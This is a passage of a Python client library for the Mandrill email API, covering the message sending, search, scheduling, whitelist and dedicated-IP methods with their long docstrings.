[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].unsubs (integer): the number of unsubscribes received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
InvalidTagNameError: The requested tag does not exist or contains invalid characters
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'tag': tag}
return self.master.call('tags/time-series', _params)
def all_time_series(self, ):
"""Return the recent history (hourly stats for the last 30 days) for all tags
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].unsubs (integer): the number of unsubscribes received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('tags/all-time-series', _params)
class Messages(object):
def __init__(self, master):
self.master = master
def send(self, message, async=False, ip_pool=None, send_at=None):
"""Send a new transactional message through Mandrill
Args:
message (struct): the information on the message to send::
message.html (string): the full HTML content to be sent
message.text (string): optional full text content to be sent
message.subject (string): the message subject
message.from_email (string): the sender email address.
message.from_name (string): optional from name to be used
message.to (array): an array of recipient information.::
message.to[] (struct): a single recipient's information.::
message.to[].email (string): the email address of the recipient
message.to[].name (string): the optional display name to use for the recipient
message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided
message.headers (struct): optional extra headers to add to the message (most headers are allowed)
message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages
message.track_opens (boolean): whether or not to turn on open tracking for the message
message.track_clicks (boolean): whether or not to turn on click tracking for the message
message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text
message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML
message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size
message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data
message.preserve_recipients (boolean): whether or not to expose all recipients in to "To" header for each email
message.view_content_link (boolean): set to false to remove content logging for sensitive emails
message.bcc_address (string): an optional address to receive an exact copy of each recipient's email
message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com
message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients)
message.return_path_domain (string): a custom domain to use for the messages's return-path
message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided.
message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.::
message.global_merge_vars[] (struct): a single global merge variable::
message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _
message.global_merge_vars[].content (string): the global merge variable's content
message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.::
message.merge_vars[] (struct): per-recipient merge variables::
message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to
message.merge_vars[].vars (array): the recipient's merge variables::
message.merge_vars[].vars[] (struct): a single merge variable::
message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _
message.merge_vars[].vars[].content (string): the merge variable's content
message.tags (array): an array of string to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.::
message.tags[] (string): a single tag - must not start with an underscore
message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error
message.google_analytics_domains (array): an array of strings indicating for which any matching URLs will automatically have Google Analytics parameters appended to their query string automatically.
message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead.
message.metadata (array): metadata an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api.
message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.::
message.recipient_metadata[] (struct): metadata for a single recipient::
message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with
message.recipient_metadata[].values (array): an associated array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used.
message.attachments (array): an array of supported attachments to add to the message::
message.attachments[] (struct): a single supported attachment::
message.attachments[].type (string): the MIME type of the attachment
message.attachments[].name (string): the file name of the attachment
message.attachments[].content (string): the content of the attachment as a base64-encoded string
message.images (array): an array of embedded images to add to the message::
message.images[] (struct): a single embedded image::
message.images[].type (string): the MIME type of the image - must start with "image/"
message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content
message.images[].content (string): the content of the image as a base64-encoded string
async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async.
ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead.
send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance.
Returns:
array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected"::
[] (struct): the sending results for a single recipient::
[].email (string): the email address of the recipient
[].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid"
[].reject_reason (string): the reason for the rejection if the recipient status is "rejected"
[]._id (string): the message's unique id
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
PaymentRequiredError: The requested feature requires payment.
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at}
return self.master.call('messages/send', _params)
def send_template(self, template_name, template_content, message, async=False, ip_pool=None, send_at=None):
"""Send a new transactional message through Mandrill using a template
Args:
template_name (string): the immutable name or slug of a template that exists in the user's account. For backwards-compatibility, the template name may also be used but the immutable slug is preferred.
template_content (array): an array of template content to send. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block::
template_content[] (struct): the injection of a single piece of content into a single editable region::
template_content[].name (string): the name of the mc:edit editable region to inject into
template_content[].content (string): the content to inject
message (struct): the other information on the message to send - same as /messages/send, but without the html content::
message.html (string): optional full HTML content to be sent if not in template
message.text (string): optional full text content to be sent
message.subject (string): the message subject
message.from_email (string): the sender email address.
message.from_name (string): optional from name to be used
message.to (array): an array of recipient information.::
message.to[] (struct): a single recipient's information.::
message.to[].email (string): the email address of the recipient
message.to[].name (string): the optional display name to use for the recipient
message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided
message.headers (struct): optional extra headers to add to the message (most headers are allowed)
message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages
message.track_opens (boolean): whether or not to turn on open tracking for the message
message.track_clicks (boolean): whether or not to turn on click tracking for the message
message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text
message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML
message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size
message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data
message.preserve_recipients (boolean): whether or not to expose all recipients in to "To" header for each email
message.view_content_link (boolean): set to false to remove content logging for sensitive emails
message.bcc_address (string): an optional address to receive an exact copy of each recipient's email
message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com
message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients)
message.return_path_domain (string): a custom domain to use for the messages's return-path
message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided.
message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.::
message.global_merge_vars[] (struct): a single global merge variable::
message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _
message.global_merge_vars[].content (string): the global merge variable's content
message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.::
message.merge_vars[] (struct): per-recipient merge variables::
message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to
message.merge_vars[].vars (array): the recipient's merge variables::
message.merge_vars[].vars[] (struct): a single merge variable::
message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _
message.merge_vars[].vars[].content (string): the merge variable's content
message.tags (array): an array of string to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.::
message.tags[] (string): a single tag - must not start with an underscore
message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error
message.google_analytics_domains (array): an array of strings indicating for which any matching URLs will automatically have Google Analytics parameters appended to their query string automatically.
message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead.
message.metadata (array): metadata an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api.
message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.::
message.recipient_metadata[] (struct): metadata for a single recipient::
message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with
message.recipient_metadata[].values (array): an associated array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used.
message.attachments (array): an array of supported attachments to add to the message::
message.attachments[] (struct): a single supported attachment::
message.attachments[].type (string): the MIME type of the attachment
message.attachments[].name (string): the file name of the attachment
message.attachments[].content (string): the content of the attachment as a base64-encoded string
message.images (array): an array of embedded images to add to the message::
message.images[] (struct): a single embedded image::
message.images[].type (string): the MIME type of the image - must start with "image/"
message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content
message.images[].content (string): the content of the image as a base64-encoded string
async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async.
ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead.
send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance.
Returns:
array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", "scheduled", or "rejected"::
[] (struct): the sending results for a single recipient::
[].email (string): the email address of the recipient
[].status (string): the sending status of the recipient - either "sent", "queued", "rejected", or "invalid"
[].reject_reason (string): the reason for the rejection if the recipient status is "rejected"
[]._id (string): the message's unique id
Raises:
UnknownTemplateError: The requested template does not exist
PaymentRequiredError: The requested feature requires payment.
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'template_name': template_name, 'template_content': template_content, 'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at}
return self.master.call('messages/send-template', _params)
def search(self, query='*', date_from=None, date_to=None, tags=None, senders=None, api_keys=None, limit=100):
"""Search the content of recently sent messages and optionally narrow by date range, tags and senders
Args:
query (string): the search terms to find matching messages for
date_from (string): start date
date_to (string): end date
tags (array): an array of tag names to narrow the search to, will return messages that contain ANY of the tags
senders (array): an array of sender addresses to narrow the search to, will return messages sent by ANY of the senders
api_keys (array): an array of API keys to narrow the search to, will return messages sent by ANY of the keys
limit (integer): the maximum number of results to return, defaults to 100, 1000 is the maximum
Returns:
array. of structs for each matching message::
[] (struct): the information for a single matching message::
[].ts (integer): the Unix timestamp from when this message was sent
[]._id (string): the message's unique id
[].sender (string): the email address of the sender
[].template (string): the unique name of the template used, if any
[].subject (string): the message's subject line
[].email (string): the recipient email address
[].tags (array): list of tags on this message::
[].tags[] (string): individual tag on this message
[].opens (integer): how many times has this message been opened
[].opens_detail (array): list of individual opens for the message::
[].opens_detail[] (struct): information on an individual open::
[].opens_detail[].ts (integer): the unix timestamp from when the message was opened
[].opens_detail[].ip (string): the IP address that generated the open
[].opens_detail[].location (string): the approximate region and country that the opening IP is located
[].opens_detail[].ua (string): the email client or browser data of the open
[].clicks (integer): how many times has a link been clicked in this message
[].clicks_detail (array): list of individual clicks for the message::
[].clicks_detail[] (struct): information on an individual click::
[].clicks_detail[].ts (integer): the unix timestamp from when the message was clicked
[].clicks_detail[].url (string): the URL that was clicked on
[].clicks_detail[].ip (string): the IP address that generated the click
[].clicks_detail[].location (string): the approximate region and country that the clicking IP is located
[].clicks_detail[].ua (string): the email client or browser data of the click
[].state (string): sending status of this message: sent, bounced, rejected
[].metadata (struct): any custom metadata provided when the message was sent
smtp_events (array): a log of up to 3 smtp events for the message::
smtp_events[] (struct): information about a specific smtp event::
smtp_events[].ts (integer): the Unix timestamp when the event occured
smtp_events[].type (string): the message's state as a result of this event
smtp_events[].diag (string): the SMTP response from the recipient's server
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
ServiceUnavailableError: The subsystem providing this API call is down for maintenance
Error: A general Mandrill error has occurred
"""
_params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders, 'api_keys': api_keys, 'limit': limit}
return self.master.call('messages/search', _params)
def search_time_series(self, query='*', date_from=None, date_to=None, tags=None, senders=None):
"""Search the content of recently sent messages and return the aggregated hourly stats for matching messages
Args:
query (string): the search terms to find matching messages for
date_from (string): start date
date_to (string): end date
tags (array): an array of tag names to narrow the search to, will return messages that contain ANY of the tags
senders (array): an array of sender addresses to narrow the search to, will return messages sent by ANY of the senders
Returns:
array. the array of history information::
[] (struct): the stats for a single hour::
[].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format
[].sent (integer): the number of emails that were sent during the hour
[].hard_bounces (integer): the number of emails that hard bounced during the hour
[].soft_bounces (integer): the number of emails that soft bounced during the hour
[].rejects (integer): the number of emails that were rejected during the hour
[].complaints (integer): the number of spam complaints received during the hour
[].unsubs (integer): the number of unsubscribes received during the hour
[].opens (integer): the number of emails opened during the hour
[].unique_opens (integer): the number of unique opens generated by messages sent during the hour
[].clicks (integer): the number of tracked URLs clicked during the hour
[].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
ServiceUnavailableError: The subsystem providing this API call is down for maintenance
Error: A general Mandrill error has occurred
"""
_params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags, 'senders': senders}
return self.master.call('messages/search-time-series', _params)
def info(self, id):
"""Get the information for a single recently sent message
Args:
id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls
Returns:
struct. the information for the message::
ts (integer): the Unix timestamp from when this message was sent
_id (string): the message's unique id
sender (string): the email address of the sender
template (string): the unique name of the template used, if any
subject (string): the message's subject line
email (string): the recipient email address
tags (array): list of tags on this message::
tags[] (string): individual tag on this message
opens (integer): how many times has this message been opened
opens_detail (array): list of individual opens for the message::
opens_detail[] (struct): information on an individual open::
opens_detail[].ts (integer): the unix timestamp from when the message was opened
opens_detail[].ip (string): the IP address that generated the open
opens_detail[].location (string): the approximate region and country that the opening IP is located
opens_detail[].ua (string): the email client or browser data of the open
clicks (integer): how many times has a link been clicked in this message
clicks_detail (array): list of individual clicks for the message::
clicks_detail[] (struct): information on an individual click::
clicks_detail[].ts (integer): the unix timestamp from when the message was clicked
clicks_detail[].url (string): the URL that was clicked on
clicks_detail[].ip (string): the IP address that generated the click
clicks_detail[].location (string): the approximate region and country that the clicking IP is located
clicks_detail[].ua (string): the email client or browser data of the click
state (string): sending status of this message: sent, bounced, rejected
metadata (struct): any custom metadata provided when the message was sent
smtp_events (array): a log of up to 3 smtp events for the message::
smtp_events[] (struct): information about a specific smtp event::
smtp_events[].ts (integer): the Unix timestamp when the event occured
smtp_events[].type (string): the message's state as a result of this event
smtp_events[].diag (string): the SMTP response from the recipient's server
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMessageError: The provided message id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('messages/info', _params)
def content(self, id):
"""Get the full content of a recently sent message
Args:
id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls
Returns:
struct. the content of the message::
ts (integer): the Unix timestamp from when this message was sent
_id (string): the message's unique id
from_email (string): the email address of the sender
from_name (string): the alias of the sender (if any)
subject (string): the message's subject line
to (struct): the message recipient's information::
to.email (string): the email address of the recipient
to.name (string): the alias of the recipient (if any)
tags (array): list of tags on this message::
tags[] (string): individual tag on this message
headers (struct): the key-value pairs of the custom MIME headers for the message's main document
text (string): the text part of the message, if any
html (string): the HTML part of the message, if any
attachments (array): an array of any attachments that can be found in the message::
attachments[] (struct): information about an individual attachment::
attachments[].name (string): the file name of the attachment
attachments[].type (string): the MIME type of the attachment
attachments[].content (string): the content of the attachment as a base64 encoded string
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMessageError: The provided message id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('messages/content', _params)
def parse(self, raw_message):
"""Parse the full MIME document for an email message, returning the content of the message broken into its constituent pieces
Args:
raw_message (string): the full MIME document of an email message
Returns:
struct. the parsed message::
subject (string): the subject of the message
from_email (string): the email address of the sender
from_name (string): the alias of the sender (if any)
to (array): an array of any recipients in the message::
to[] (struct): the information on a single recipient::
to[].email (string): the email address of the recipient
to[].name (string): the alias of the recipient (if any)
headers (struct): the key-value pairs of the MIME headers for the message's main document
text (string): the text part of the message, if any
html (string): the HTML part of the message, if any
attachments (array): an array of any attachments that can be found in the message::
attachments[] (struct): information about an individual attachment::
attachments[].name (string): the file name of the attachment
attachments[].type (string): the MIME type of the attachment
attachments[].binary (boolean): if this is set to true, the attachment is not pure-text, and the content will be base64 encoded
attachments[].content (string): the content of the attachment as a text string or a base64 encoded string based on the attachment type
images (array): an array of any embedded images that can be found in the message::
images[] (struct): information about an individual image::
images[].name (string): the Content-ID of the embedded image
images[].type (string): the MIME type of the image
images[].content (string): the content of the image as a base64 encoded string
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'raw_message': raw_message}
return self.master.call('messages/parse', _params)
def send_raw(self, raw_message, from_email=None, from_name=None, to=None, async=False, ip_pool=None, send_at=None, return_path_domain=None):
"""Take a raw MIME document for a message, and send it exactly as if it were sent through Mandrill's SMTP servers
Args:
raw_message (string): the full MIME document of an email message
from_email (string|null): optionally define the sender address - otherwise we'll use the address found in the provided headers
from_name (string|null): optionally define the sender alias
to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document::
to[] (string): the email address of the recipient
async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/sendRaw will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async.
ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead.
send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately.
return_path_domain (string): a custom domain to use for the messages's return-path
Returns:
array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected"::
[] (struct): the sending results for a single recipient::
[].email (string): the email address of the recipient
[].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid"
[].reject_reason (string): the reason for the rejection if the recipient status is "rejected"
[]._id (string): the message's unique id
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
PaymentRequiredError: The requested feature requires payment.
UnknownTemplateError: The requested template does not exist
UnknownSubaccountError: The provided subaccount id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'raw_message': raw_message, 'from_email': from_email, 'from_name': from_name, 'to': to, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at, 'return_path_domain': return_path_domain}
return self.master.call('messages/send-raw', _params)
def list_scheduled(self, to=None):
"""Queries your scheduled emails by sender or recipient, or both.
Args:
to (string): an optional recipient address to restrict results to
Returns:
array. a list of up to 1000 scheduled emails::
[] (struct): a scheduled email::
[]._id (string): the scheduled message id
[].created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format
[].send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format
[].from_email (string): the email's sender address
[].to (string): the email's recipient
[].subject (string): the email's subject
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'to': to}
return self.master.call('messages/list-scheduled', _params)
def cancel_scheduled(self, id):
"""Cancels a scheduled email.
Args:
id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled
Returns:
struct. information about the scheduled email that was cancelled.::
_id (string): the scheduled message id
created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format
send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format
from_email (string): the email's sender address
to (string): the email's recipient
subject (string): the email's subject
Raises:
UnknownMessageError: The provided message id does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'id': id}
return self.master.call('messages/cancel-scheduled', _params)
def reschedule(self, id, send_at):
"""Reschedules a scheduled email.
Args:
id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled
send_at (string): the new UTC timestamp when the message should sent. Mandrill can't time travel, so if you specify a time in past the message will be sent immediately
Returns:
struct. information about the scheduled email that was rescheduled.::
_id (string): the scheduled message id
created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format
send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format
from_email (string): the email's sender address
to (string): the email's recipient
subject (string): the email's subject
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
UnknownMessageError: The provided message id does not exist.
Error: A general Mandrill error has occurred
"""
_params = {'id': id, 'send_at': send_at}
return self.master.call('messages/reschedule', _params)
class Whitelists(object):
def __init__(self, master):
self.master = master
def add(self, email):
"""Adds an email to your email rejection whitelist. If the address is
currently on your blacklist, that blacklist entry will be removed
automatically.
Args:
email (string): an email address to add to the whitelist
Returns:
struct. a status object containing the address and the result of the operation::
email (string): the email address you provided
whether (boolean): the operation succeeded
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'email': email}
return self.master.call('whitelists/add', _params)
def list(self, email=None):
"""Retrieves your email rejection whitelist. You can provide an email
address or search prefix to limit the results. Returns up to 1000 results.
Args:
email (string): an optional email address or prefix to search by
Returns:
array. up to 1000 whitelist entries::
[] (struct): the information for each whitelist entry::
[].email (string): the email that is whitelisted
[].detail (string): a description of why the email was whitelisted
[].created_at (string): when the email was added to the whitelist
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'email': email}
return self.master.call('whitelists/list', _params)
def delete(self, email):
"""Removes an email address from the whitelist.
Args:
email (string): the email address to remove from the whitelist
Returns:
struct. a status object containing the address and whether the deletion succeeded::
email (string): the email address that was removed from the blacklist
deleted (boolean): whether the address was deleted successfully
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'email': email}
return self.master.call('whitelists/delete', _params)
class Ips(object):
def __init__(self, master):
self.master = master
def list(self, ):
"""Lists your dedicated IPs.
Returns:
array. an array of structs for each dedicated IP::
[] (struct): information about a single dedicated IP::
[].ip (string): the ip address
[].created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
[].pool (string): the name of the pool that this dedicated IP belongs to
[].domain (string): the domain name (reverse dns) of this dedicated IP
[].custom_dns (struct): information about the ip's custom dns, if it has been configured::
[].custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
[].custom_dns.valid (boolean): whether the ip's custom dns is currently valid
[].custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
[].warmup (struct): information about the ip's warmup status::
[].warmup.warming_up (boolean): whether the ip is currently in warmup mode
[].warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
[].warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {}
return self.master.call('ips/list', _params)
def info(self, ip):
"""Retrieves information about a single dedicated ip.
Args:
ip (string): a dedicated IP address
Returns:
struct. Information about the dedicated ip::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/info', _params)
def provision(self, warmup=False, pool=None):
"""Requests an additional dedicated IP for your account. Accounts may
have one outstanding request at any time, and provisioning requests
are processed within 24 hours.
Args:
warmup (boolean): whether to enable warmup mode for the ip
pool (string): the id of the pool to add the dedicated ip to, or null to use your account's default pool
Returns:
struct. a description of the provisioning request that was created::
requested_at (string): the date and time that the request was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format
Raises:
IPProvisionLimitError: A dedicated IP cannot be provisioned while another request is pending.
UnknownPoolError: The provided dedicated IP pool does not exist.
PaymentRequiredError: The requested feature requires payment.
InvalidKeyError: The provided API key is not a valid Mandrill API key
NoSendingHistoryError: The user hasn't started sending yet.
PoorReputationError: The user's reputation is too low to continue.
Error: A general Mandrill error has occurred
"""
_params = {'warmup': warmup, 'pool': pool}
return self.master.call('ips/provision', _params)
def start_warmup(self, ip):
"""Begins the warmup process for a dedicated IP. During the warmup process,
Mandrill will gradually increase the percentage of your mail that is sent over
the warming-up IP, over a period of roughly 30 days. The rest of your mail
will be sent over shared IPs or other dedicated IPs in the same pool.
Args:
ip (string): a dedicated ip address
Returns:
struct. Information about the dedicated IP::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
UnknownIPError: The provided dedicated IP does not exist.
InvalidKeyError: The provided API key is not a valid Mandrill API key
Error: A general Mandrill error has occurred
"""
_params = {'ip': ip}
return self.master.call('ips/start-warmup', _params)
def cancel_warmup(self, ip):
"""Cancels the warmup process for a dedicated IP.
Args:
ip (string): a dedicated ip address
Returns:
struct. Information about the dedicated IP::
ip (string): the ip address
created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format
pool (string): the name of the pool that this dedicated IP belongs to
domain (string): the domain name (reverse dns) of this dedicated IP
custom_dns (struct): information about the ip's custom dns, if it has been configured::
custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip
custom_dns.valid (boolean): whether the ip's custom dns is currently valid
custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error
warmup (struct): information about the ip's warmup status::
warmup.warming_up (boolean): whether the ip is currently in warmup mode
warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format
Raises:
